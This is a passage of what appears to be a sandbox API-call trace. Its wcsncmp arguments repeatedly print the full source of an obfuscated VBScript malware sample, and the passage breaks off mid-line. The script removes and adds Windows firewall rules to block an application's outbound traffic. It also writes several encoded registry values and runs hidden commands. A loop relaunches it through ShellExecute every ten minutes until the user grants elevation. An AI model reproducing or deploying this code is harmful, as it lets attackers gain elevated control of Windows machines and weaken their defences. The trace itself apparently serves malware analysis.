NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0226.326] wcsncmp (_String1="P = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0226.326] wcsncmp (_String1=" = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.326] wcsncmp (_String1="= 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.326] wcsncmp (_String1=" 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run 